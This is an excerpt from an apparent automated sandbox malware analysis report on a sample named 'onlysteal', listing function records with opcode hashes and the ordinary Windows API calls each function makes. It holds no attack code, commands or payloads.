                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 58ff7188110156a1716f9e75adc34a4ef0980984936859b35dea1f05037d7aef
                                      • Instruction ID: fccb3d8372275bd067f283cdcc510909ca16111726313f63f720b04c0a5bd0e5
                                      • Opcode Fuzzy Hash: 58ff7188110156a1716f9e75adc34a4ef0980984936859b35dea1f05037d7aef
                                      • Instruction Fuzzy Hash: 06C0123605C200BECB018BB4EC0DC2BBBA8ABA5316F04C90AB0A9C0070C239C110DB11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 7c029af2081cd22823dbfd4bdc98e1cfc7184da082b4275dde896a71ab73a1b8
                                      • Instruction ID: 6e107a7d9be5ba050bbc453e1edde5e87997590f4d689af45f63467b1067877f
                                      • Opcode Fuzzy Hash: 7c029af2081cd22823dbfd4bdc98e1cfc7184da082b4275dde896a71ab73a1b8
                                      • Instruction Fuzzy Hash: 95C1E4B0A202559FEF14CF28C494BA97BA6AF16314F0845BAEC45DF382DB709D74CB61
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: c71d9ae9bec8d4f1f0018807c3f425d3041743def89afca78fcbd0ec44dcb89f
                                      • Instruction ID: baff7fa7ac63af3fc7e26da145723e1c2c20b5d290cb856620008c8728f137b1
                                      • Opcode Fuzzy Hash: c71d9ae9bec8d4f1f0018807c3f425d3041743def89afca78fcbd0ec44dcb89f
                                      • Instruction Fuzzy Hash: 1D71E2B1120B859EDB35DF70C8459E7B7E9AF14301F40492EF5EB87241DA32AAA8CF11
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00238289
                                        • Part of subcall function 002313DC: __EH_prolog.LIBCMT ref: 002313E1
                                        • Part of subcall function 0023A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0023A598
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog$CloseFind
                                      • String ID:
                                      • API String ID: 2506663941-0
                                      • Opcode ID: 1f15db41a7d041152209d390b0b203b710c4c43571d85a434b9a65c8b434e341
                                      • Instruction ID: 2f1ffdd65131cc7fcd33c7b21e41a2ed00b1cdb69647e9db1a00ccd033db12d3
                                      • Opcode Fuzzy Hash: 1f15db41a7d041152209d390b0b203b710c4c43571d85a434b9a65c8b434e341
                                      • Instruction Fuzzy Hash: 5741C7B19247599ADB24DB60CC55AEAB378BF00304F0404EBF18AAB182EB705ED9CF10
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 002313E1
                                        • Part of subcall function 00235E37: __EH_prolog.LIBCMT ref: 00235E3C
                                        • Part of subcall function 0023CE40: __EH_prolog.LIBCMT ref: 0023CE45
                                        • Part of subcall function 0023B505: __EH_prolog.LIBCMT ref: 0023B50A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 87da16c59abf700a144aed23f4e0f6e8d00b8cc656c3da1c6226d47c016fbd14
                                      • Instruction ID: b5b16915be42cc6f4ee1cfaaabc2594de551a8dfbe1054b68e6728ac90254fc0
                                      • Opcode Fuzzy Hash: 87da16c59abf700a144aed23f4e0f6e8d00b8cc656c3da1c6226d47c016fbd14
                                      • Instruction Fuzzy Hash: 444129B0915B409EE724DF798885AE6FAE5BF19300F51492ED5FF83282CB716664CF10
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 002313E1
                                        • Part of subcall function 00235E37: __EH_prolog.LIBCMT ref: 00235E3C
                                        • Part of subcall function 0023CE40: __EH_prolog.LIBCMT ref: 0023CE45
                                        • Part of subcall function 0023B505: __EH_prolog.LIBCMT ref: 0023B50A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 99a1ede1c22d7761d1cd0d163ef36647e41cf6015ffbbcbb869f6b96b60a70c8
                                      • Instruction ID: c80a1ad28745e65bd8c74a37781e3dbb5b3f4b4bbbcd9dc32f98dda7cbaf05ae
                                      • Opcode Fuzzy Hash: 99a1ede1c22d7761d1cd0d163ef36647e41cf6015ffbbcbb869f6b96b60a70c8
                                      • Instruction Fuzzy Hash: 294137B0915B409AE724DF798885AE6FAE5BF19300F51492ED5FF83282CB726664CF10
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0024B098
                                        • Part of subcall function 002313DC: __EH_prolog.LIBCMT ref: 002313E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: e8684f03b78d83dcd3ad53c637fba6aa8d6ca41b3502b206104e8b3d9dd0faa4
                                      • Instruction ID: f12aa12be46c08d57d0528825d8f68691c4cc670e600b854c1e97edf81078e8e
                                      • Opcode Fuzzy Hash: e8684f03b78d83dcd3ad53c637fba6aa8d6ca41b3502b206104e8b3d9dd0faa4
                                      • Instruction Fuzzy Hash: 4E317C75C20249EBDF19DFA8C951AEEBBB4AF09304F10449EE409B7242D775AE24CF61
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,00263A34), ref: 0025ACF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 9c2c754ed0c436809ce1f39e46d834e42ae5bf64015dd11e556a574ff4598acd
                                      • Instruction ID: 2b81917f2b53524a4428c0db3bd1eb0cf9756e2e09c3fc3ba4c86d2b87405ef9
                                      • Opcode Fuzzy Hash: 9c2c754ed0c436809ce1f39e46d834e42ae5bf64015dd11e556a574ff4598acd
                                      • Instruction Fuzzy Hash: DF113A376212265F8F22EE1CEC4685AB3A5AB843237168321FD15EF254D730DC1587D6
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0023CE45
                                        • Part of subcall function 00235E37: __EH_prolog.LIBCMT ref: 00235E3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 41f0945c4c76c568ff52a5a229c1f6c254b1b8b91ea455c2f7ff9e0759ffa418
                                      • Instruction ID: b0040ab66a2baa065636709ed911dce1c44c4997a339bd8c04dfc8e49da374e7
                                      • Opcode Fuzzy Hash: 41f0945c4c76c568ff52a5a229c1f6c254b1b8b91ea455c2f7ff9e0759ffa418
                                      • Instruction Fuzzy Hash: 2E11A3B1A21244DEEB14DB79C5057AEF7E8EF44300F20446EE486E3282DBB49E14CF62
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: f14fbd7f3352422ab6364d081878ed321b46425f6a2cee7712b896b566dbfc0b
                                      • Instruction ID: 0b3e56718c49dd59057820d20be02dc07c8182c00b8825490ba9f083e09079e1
                                      • Opcode Fuzzy Hash: f14fbd7f3352422ab6364d081878ed321b46425f6a2cee7712b896b566dbfc0b
                                      • Instruction Fuzzy Hash: 9E01A5B3D20929ABCF11AFA8CC919DFB735BF89740F014515EC16B7112DA748D65CAA0
                                      APIs
                                        • Part of subcall function 0025B136: RtlAllocateHeap.NTDLL(00000008,00263A34,00000000,?,0025989A,00000001,00000364,?,?,?,0023D984,?,?,?,00000004,0023D710), ref: 0025B177
                                      • _free.LIBCMT ref: 0025C4E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                      • Instruction ID: 7273d03f175e5b0e8d98e45fdf492918ce310f673c8df33dfca4d1e112e73d4e
                                      • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                      • Instruction Fuzzy Hash: 0A0126722103066FE3318E659881D6AFBE9FB85331F25061DE98483281FA30A809CB38
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00263A34,00000000,?,0025989A,00000001,00000364,?,?,?,0023D984,?,?,?,00000004,0023D710), ref: 0025B177
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7f1ffcb83658e36159c2b415bd9fd3c34a7d70497f3e50bd79e4da66abb7d14d
                                      • Instruction ID: f9ba45fba37cd646f852a258673db1878290ad0b7af8411346afe9e3a06cee5c
                                      • Opcode Fuzzy Hash: 7f1ffcb83658e36159c2b415bd9fd3c34a7d70497f3e50bd79e4da66abb7d14d
                                      • Instruction Fuzzy Hash: 21F0B432535926B7DFA25E71AC29B5E3748AB41772B18C112FC0CA6190CB70DD2D86EC
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00253C3F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: f4a499b980233a3498de02bc57f19b0d8fc4a61c1a339524dfbeb332751a84ba
                                      • Instruction ID: b70d8a1fb109ea0479968c445cd587bbdb20b4a35ed04810f052f13115507da8
                                      • Opcode Fuzzy Hash: f4a499b980233a3498de02bc57f19b0d8fc4a61c1a339524dfbeb332751a84ba
                                      • Instruction Fuzzy Hash: 0DF0A7332242179F8F11CEA8FC0499A7799EF01BA37105126FE05E7190DB31DA34C794
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 95cf15ececbbdb612c403531f32f36dbc73843ae1be6f0eab1fd3c81237d8a84
                                      • Instruction ID: 0f3eec2fc486d9e68b8a78aa489e53cc2d9ca1ed94baccdc9fe962acdcb51907
                                      • Opcode Fuzzy Hash: 95cf15ececbbdb612c403531f32f36dbc73843ae1be6f0eab1fd3c81237d8a84
                                      • Instruction Fuzzy Hash: 84E0E53123212656EA712E21AC0AB5F36689B413A3F110111BC09B6091DFF0CC3885ED
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00235AC2
                                        • Part of subcall function 0023B505: __EH_prolog.LIBCMT ref: 0023B50A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ad280497cbedcd2a15fc116ff2aa1a20605dce72d11d14ce6e90e8e61cd3696a
                                      • Instruction ID: e52a1d2266fdb9464e9ade82d79d3894a635d5654817869e887edbc502bbea82
                                      • Opcode Fuzzy Hash: ad280497cbedcd2a15fc116ff2aa1a20605dce72d11d14ce6e90e8e61cd3696a
                                      • Instruction Fuzzy Hash: BF018170420690DAD719EBB8C081BDDF7A8DF64304F51848DA56753282CBB41B28DBA2
                                      APIs
                                        • Part of subcall function 0023A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6C4
                                        • Part of subcall function 0023A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6F2
                                        • Part of subcall function 0023A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6FE
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0023A598
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Find$FileFirst$CloseErrorLast
                                      • String ID:
                                      • API String ID: 1464966427-0
                                      • Opcode ID: 740766d701b689d74513cadf8bb289b1dda93a0d6b04a2ab23bbe3e1d5fd008f
                                      • Instruction ID: e10d839be1745cf46fe20ebead7739d6853fa5ccf63280c5dee3f684359e3844
                                      • Opcode Fuzzy Hash: 740766d701b689d74513cadf8bb289b1dda93a0d6b04a2ab23bbe3e1d5fd008f
                                      • Instruction Fuzzy Hash: 64F08271428790AACB225BB48905BCB7B946F1A331F048A4DF5FD52196C2B550A89F23
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00240E3D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: 2ec172c43d4fe43b365488843f12bafe3bc2c03dee8cdd70078ca6746da4db8c
                                      • Instruction ID: 0cd676287021d60fb0920455e393154a82b0e038459527bf1ad32893c37d0d86
                                      • Opcode Fuzzy Hash: 2ec172c43d4fe43b365488843f12bafe3bc2c03dee8cdd70078ca6746da4db8c
                                      • Instruction Fuzzy Hash: BED0C210B3105526DB193728285D7FE390A8FD6314F0C4426F5495B1C2CAA848F6A661
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 0024A62C
                                        • Part of subcall function 0024A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0024A3DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction ID: ec272aa8e653ae066e2aaa5910b47ac8b11e9913a44067d26432a296d80efb80
                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction Fuzzy Hash: 3FD0C9712B0209BAEF4AAF618C1296E7A99FB00344F058125B842D5192EAB1D930AA66
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00241B3E), ref: 0024DD92
                                        • Part of subcall function 0024B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                        • Part of subcall function 0024B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                        • Part of subcall function 0024B568: IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                        • Part of subcall function 0024B568: TranslateMessage.USER32(?), ref: 0024B5AC
                                        • Part of subcall function 0024B568: DispatchMessageW.USER32(?), ref: 0024B5B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
